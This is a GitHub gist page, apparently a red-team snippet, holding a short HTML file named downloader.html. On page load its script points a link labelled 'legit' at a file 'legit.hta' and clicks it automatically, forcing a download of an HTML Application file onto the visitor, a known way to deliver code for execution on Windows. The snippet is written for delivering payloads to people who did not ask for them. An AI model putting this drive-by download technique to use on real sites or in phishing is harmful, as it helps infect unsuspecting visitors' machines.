Skip to content

Instantly share code, notes, and snippets.

@C0axx
Forked from rvrsh3ll/downloader.html
Created January 30, 2020 18:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save C0axx/15f6d17f98f3d81cb118da8fdb8a4bdf to your computer and use it in GitHub Desktop.
Save C0axx/15f6d17f98f3d81cb118da8fdb8a4bdf to your computer and use it in GitHub Desktop.
<a href="#" id="download">legit</al>
<script>
var element = document.getElementById("download");
element.href = "legit.hta";
element.click();
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment